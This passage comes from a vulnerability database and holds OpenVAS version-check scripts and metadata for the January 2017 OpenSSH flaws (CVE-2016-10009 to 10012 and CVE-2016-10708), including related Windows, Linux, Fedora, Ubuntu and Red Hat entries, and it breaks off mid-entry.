ID OPENVAS:1361412562310810325 Type openvas Reporter Copyright (C) 2017 Greenbone Networks GmbH Modified 2019-05-21T00:00:00
Description
This host is installed with openssh and
is prone to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
#
# OpenSSH Multiple Vulnerabilities Jan17 (Windows)
#
# Authors:
# Tushar Khelge <ktushar@secpod.com>
#
# Copyright:
# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
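CPE = "cpe:/a:openbsd:openssh";

if(description)
{
  # Registration phase: the scanner runs the script once with `description`
  # set and only collects the metadata below; no check is performed here.
  script_oid("1.3.6.1.4.1.25623.1.0.810325");
  script_version("2019-05-21T12:48:06+0000");
  script_cve_id("CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10708");
  # Four BIDs for five CVEs: the NEWKEYS NULL-dereference entry
  # (CVE-2016-10708) has no BugTraq id recorded in this script.
  script_bugtraq_id(94968, 94972, 94977, 94975);
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_tag(name:"last_modification", value:"2019-05-21 12:48:06 +0000 (Tue, 21 May 2019)");
  script_tag(name:"creation_date", value:"2017-01-06 10:55:34 +0530 (Fri, 06 Jan 2017)");
  script_name("OpenSSH Multiple Vulnerabilities Jan17 (Windows)");
  script_copyright("Copyright (C) 2017 Greenbone Networks GmbH");
  script_category(ACT_GATHER_INFO);
  script_family("General");
  # The script is only scheduled when both keys exist, i.e. the dependencies
  # detected an OpenSSH service and classified the host as Windows.
  script_dependencies("gb_openssh_consolidation.nasl", "os_detection.nasl");
  script_mandatory_keys("openssh/detected", "Host/runs_windows");

  script_xref(name:"URL", value:"https://www.openssh.com/txt/release-7.4");
  script_xref(name:"URL", value:"http://www.openwall.com/lists/oss-security/2016/12/19/2");
  script_xref(name:"URL", value:"http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html");
  script_xref(name:"URL", value:"https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737");

  script_tag(name:"summary", value:"This host is installed with openssh and
  is prone to multiple vulnerabilities.");

  script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");

  # Report text shown to the user; spelling fixed ("exists" -> "exist").
  script_tag(name:"insight", value:"Multiple flaws exist due to:

  - An 'authfile.c' script does not properly consider the effects of realloc
  on buffer contents.

  - The shared memory manager (associated with pre-authentication compression)
  does not ensure that a bounds check is enforced by all compilers.

  - The sshd in OpenSSH creates forwarded Unix-domain sockets as root, when
  privilege separation is not used.

  - An untrusted search path vulnerability in ssh-agent.c in ssh-agent.

  - NULL pointer dereference error due to an out-of-sequence NEWKEYS message.");

  # Report text shown to the user; spelling fixed ("senial" -> "denial").
  script_tag(name:"impact", value:"Successfully exploiting this issue allows
  local users to obtain sensitive private-key information, to gain privileges,
  conduct a denial-of-service condition and allows remote attackers to execute
  arbitrary local PKCS#11 modules.");

  script_tag(name:"affected", value:"OpenSSH versions before 7.4 on Windows.");

  script_tag(name:"solution", value:"Upgrade to OpenSSH version 7.4 or later.");

  script_tag(name:"solution_type", value:"VendorFix");
  # remote_banner: the verdict rests only on the version string advertised in
  # the SSH banner. A build that backports the fixes but keeps an older version
  # string is still reported, so treat a hit as "needs confirmation", not proof.
  script_tag(name:"qod_type", value:"remote_banner");

  exit(0);
}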
include("version_func.inc");
include("host_details.inc");

# Detection phase: locate the OpenSSH service recorded by the consolidation
# script and compare its banner-derived version against the fixed release.
port = get_app_port(cpe:CPE);
if(isnull(port))
  exit(0);

# exit_no_version:TRUE makes the helper bail out itself when no version string
# is known, so an empty result here only means "nothing to check".
infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE);
if(!infos)
  exit(0);

installed = infos["version"];
location = infos["location"];

# exit(99) is the OpenVAS convention for "checked, not affected".
if(!version_is_less(version:installed, test_version:"7.4"))
  exit(99);

# Banner-based comparison only (qod_type remote_banner): the reported version
# may not reflect backported fixes, so the finding warrants confirmation.
report = report_fixed_ver(installed_version:installed, fixed_version:"7.4", install_path:location);
security_message(port:port, data:report);
exit(0);
{"id": "OPENVAS:1361412562310810325", "type": "openvas", "bulletinFamily": "scanner", "title": "OpenSSH Multiple Vulnerabilities Jan17 (Windows)", "description": "This host is installed with openssh and\n is prone to multiple vulnerabilities.", "published": "2017-01-06T00:00:00", "modified": "2019-05-21T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810325", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737", "http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html", "https://www.openssh.com/txt/release-7.4", "http://www.openwall.com/lists/oss-security/2016/12/19/2"], "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "lastseen": "2019-05-29T18:33:55", "viewCount": 91, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310871873", "OPENVAS:1361412562311220181254", "OPENVAS:1361412562311220171054", "OPENVAS:1361412562310891257", "OPENVAS:1361412562311220181068", "OPENVAS:13614125623108103256", "OPENVAS:1361412562311220171055", "OPENVAS:1361412562310872239", "OPENVAS:1361412562310843425", "OPENVAS:1361412562310891500"]}, {"type": "archlinux", "idList": ["ASA-201612-20"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-0264-1.NASL", "OPENSUSE-2017-184.NASL", "REDHAT-RHSA-2017-2029.NASL", "CENTOS_RHSA-2017-2029.NASL", "SLACKWARE_SSA_2016-358-02.NASL", "ORACLELINUX_ELSA-2017-2029.NASL", "OPENSSH_74.NASL", "PHOTONOS_PHSA-2017-0001_OPENSSH.NASL", "UBUNTU_USN-3538-1.NASL", "JUNIPER_SPACE_JSA10880.NASL"]}, {"type": "symantec", "idList": ["SMNTC-1397", "SMNTC-1469"]}, {"type": "slackware", "idList": ["SSA-2016-358-02"]}, {"type": "cve", "idList": ["CVE-2016-10010", "CVE-2016-10708", "CVE-2016-10012", "CVE-2016-10011", "CVE-2016-10009"]}, {"type": "f5", "idList": 
["F5:K32485746", "F5:K31440025", "F5:K24324390", "F5:K62201745", "F5:K64292204"]}, {"type": "ubuntu", "idList": ["USN-3809-1", "USN-3538-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:9760638505AB3E758B4030C32D579480", "CFOUNDRY:AD75AE1BC6EAF1FB6EA7CEC33AAA7C78"]}, {"type": "fedora", "idList": ["FEDORA:D8A2B60A94E1"]}, {"type": "seebug", "idList": ["SSV:92580", "SSV:92581", "SSV:92582", "SSV:92579"]}, {"type": "centos", "idList": ["CESA-2017:2029"]}, {"type": "redhat", "idList": ["RHSA-2017:2029"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY10.ASC"]}, {"type": "amazon", "idList": ["ALAS-2017-898"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2029"]}, {"type": "freebsd", "idList": ["2C948527-D823-11E6-9171-14DAE9D210B8", "2AEDD15F-CA8B-11E6-A9A5-B499BAEBFEAF"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1500-1:E6BD7", "DEBIAN:DLA-1257-1:E0ED4"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2128-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-26577", "1337DAY-ID-26576"]}, {"type": "myhack58", "idList": ["MYHACK58:62201682311"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140261"]}, {"type": "exploitdb", "idList": ["EDB-ID:40962"]}], "modified": "2019-05-29T18:33:55", "rev": 2}, "score": {"value": 8.2, "vector": "NONE", "modified": "2019-05-29T18:33:55", "rev": 2}, "vulnersScore": 8.2}, "pluginID": "1361412562310810325", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSH Multiple Vulnerabilities Jan17 (Windows)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openbsd:openssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810325\");\n script_version(\"2019-05-21T12:48:06+0000\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\");\n script_bugtraq_id(94968, 94972, 94977, 94975);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 12:48:06 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 10:55:34 +0530 (Fri, 06 Jan 2017)\");\n script_name(\"OpenSSH Multiple Vulnerabilities Jan17 (Windows)\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_openssh_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"openssh/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.openssh.com/txt/release-7.4\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/12/19/2\");\n script_xref(name:\"URL\", value:\"http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html\");\n script_xref(name:\"URL\", value:\"https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737\");\n\n script_tag(name:\"summary\", value:\"This host is installed with openssh and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An 'authfile.c' script does not properly consider the effects of realloc\n on buffer contents.\n\n - The shared memory manager (associated with pre-authentication compression)\n does not ensure that a bounds check is enforced by all compilers.\n\n - The sshd in OpenSSH creates forwarded Unix-domain sockets as root, when\n privilege separation is not used.\n\n - An untrusted search path vulnerability in ssh-agent.c in ssh-agent.\n\n - NULL pointer dereference error due to an out-of-sequence NEWKEYS message.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows\n local users to obtain sensitive private-key information, to gain privileges,\n conduct a senial-of-service condition and allows remote attackers to execute\n arbitrary local PKCS#11 modules.\");\n\n script_tag(name:\"affected\", value:\"OpenSSH versions before 7.4 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenSSH version 7.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"7.4\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"7.4\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);", "naslFamily": "General"}
{"openvas": [{"lastseen": "2019-05-29T18:33:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "description": "This host is installed with openssh and\n is prone to multiple vulnerabilities.", "modified": "2019-05-21T00:00:00", "published": "2017-01-06T00:00:00", "id": "OPENVAS:13614125623108103256", "href": "http://plugins.openvas.org/nasl.php?oid=13614125623108103256", "type": "openvas", "title": "OpenSSH Multiple Vulnerabilities Jan17 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenSSH Multiple Vulnerabilities Jan17 (Linux)\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openbsd:openssh\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.8103256\");\n script_version(\"2019-05-21T12:48:06+0000\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-10708\");\n script_bugtraq_id(94968, 94972, 94977, 94975);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-21 12:48:06 +0000 (Tue, 21 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-06 11:19:51 +0530 (Fri, 06 Jan 2017)\");\n script_name(\"OpenSSH Multiple Vulnerabilities Jan17 (Linux)\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_openssh_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"openssh/detected\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.openssh.com/txt/release-7.4\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2016/12/19/2\");\n script_xref(name:\"URL\", value:\"http://blog.swiecki.net/2018/01/fuzzing-tcp-servers.html\");\n script_xref(name:\"URL\", value:\"https://anongit.mindrot.org/openssh.git/commit/?id=28652bca29046f62c7045e933e6b931de1d16737\");\n\n script_tag(name:\"summary\", value:\"This host is installed with openssh and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An 'authfile.c' script does not properly consider the effects of realloc\n on buffer contents.\n\n - The shared memory manager (associated with pre-authentication compression)\n does not ensure that a bounds check is enforced by all compilers.\n\n - The sshd in OpenSSH creates forwarded Unix-domain sockets as root, when\n privilege separation is not used.\n\n - An untrusted search path vulnerability in ssh-agent.c in ssh-agent.\n\n - NULL pointer dereference error due to an out-of-sequence NEWKEYS message.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows\n local users to obtain sensitive private-key information, to gain privileges,\n conduct a senial-of-service condition and allows remote attackers to execute\n arbitrary local PKCS#11 modules.\");\n\n script_tag(name:\"affected\", value:\"OpenSSH versions before 7.4 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenSSH version 7.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"7.4\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"7.4\", install_path:path);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2016-10012"], "description": "The remote host is missing an update for the ", "modified": 
"2019-03-15T00:00:00", "published": "2017-01-10T00:00:00", "id": "OPENVAS:1361412562310872239", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872239", "type": "openvas", "title": "Fedora Update for openssh FEDORA-2017-4767e2991d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssh FEDORA-2017-4767e2991d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872239\");\n script_version(\"$Revision: 14225 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 15:32:03 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-01-10 05:52:19 +0100 (Tue, 10 Jan 2017)\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for openssh FEDORA-2017-4767e2991d\");\n 
script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"openssh on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-4767e2991d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UZROAYXZFIPMUCBTOK53F2RN4FDXSYEP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.4p1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-10010", "CVE-2017-15906", "CVE-2016-10012"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-01-23T00:00:00", "id": "OPENVAS:1361412562310843425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843425", "type": "openvas", "title": "Ubuntu Update for openssh USN-3538-1", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3538_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for openssh USN-3538-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843425\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-23 07:38:02 +0100 (Tue, 23 Jan 2018)\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10010\", \"CVE-2016-10011\", \"CVE-2016-10012\",\n \"CVE-2017-15906\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for openssh USN-3538-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable 
version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Jann Horn discovered that OpenSSH\n incorrectly loaded PKCS#11 modules from untrusted directories. A remote attacker\n could possibly use this issue to execute arbitrary PKCS#11 modules. This issue\n only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10009) Jann Horn\n discovered that OpenSSH incorrectly handled permissions on Unix-domain sockets\n when privilege separation is disabled. A local attacker could possibly use this\n issue to gain privileges. This issue only affected Ubuntu 16.04 LTS.\n (CVE-2016-10010) Jann Horn discovered that OpenSSH incorrectly handled certain\n buffer memory operations. A local attacker could possibly use this issue to\n obtain sensitive information. This issue only affected Ubuntu 14.04 LTS and\n Ubuntu 16.04 LTS. (CVE-2016-10011) Guido Vranken discovered that OpenSSH\n incorrectly handled certain shared memory manager operations. A local attacker\n could possibly use issue to gain privileges. This issue only affected Ubuntu\n 14.04 LTS and Ubuntu 16.04 LTS. This issue only affected Ubuntu 14.04 LTS and\n Ubuntu 16.04 LTS. (CVE-2016-10012) Michal Zalewski discovered that OpenSSH\n incorrectly prevented write operations in readonly mode. A remote attacker could\n possibly use this issue to create zero-length files, leading to a denial of\n service. 
(CVE-2017-15906)\");\n script_tag(name:\"affected\", value:\"openssh on Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3538-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3538-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.6p1-2ubuntu2.10\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:7.5p1-10ubuntu0.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:7.2p2-4ubuntu2.4\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": 
"2017-08-04T00:00:00", "id": "OPENVAS:1361412562310871873", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871873", "type": "openvas", "title": "RedHat Update for openssh RHSA-2017:2029-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2029-01_openssh.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for openssh RHSA-2017:2029-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871873\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:29 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2016-10009\", \"CVE-2016-10011\", \"CVE-2016-10012\", \"CVE-2016-6210\",\n \"CVE-2016-6515\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for openssh 
RHSA-2017:2029-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is an SSH protocol implementation\n supported by a number of Linux, UNIX, and similar operating systems. It includes\n the core files necessary for both the OpenSSH client and server. The following\n packages have been upgraded to a later upstream version: openssh (7.4p1).\n (BZ#1341754) Security Fix(es): * A covert timing channel flaw was found in the\n way OpenSSH handled authentication of non-existent users. A remote\n unauthenticated attacker could possibly use this flaw to determine valid user\n names by measuring the timing of server responses. (CVE-2016-6210) * It was\n found that OpenSSH did not limit password lengths for password authentication. A\n remote unauthenticated attacker could use this flaw to temporarily trigger high\n CPU consumption in sshd by sending long passwords. (CVE-2016-6515) * It was\n found that ssh-agent could load PKCS#11 modules from arbitrary paths. An\n attacker having control of the forwarded agent-socket on the server, and the\n ability to write to the filesystem of the client host, could use this flaw to\n execute arbitrary code with the privileges of the user running ssh-agent.\n (CVE-2016-10009) * It was found that the host private key material could\n possibly leak to the privilege-separated child processes via re-allocated\n memory. An attacker able to compromise the privilege-separated process could\n therefore obtain the leaked key information. (CVE-2016-10011) * It was found\n that the boundary checks in the code implementing support for pre-authentication\n compression could have been optimized out by certain compilers. 
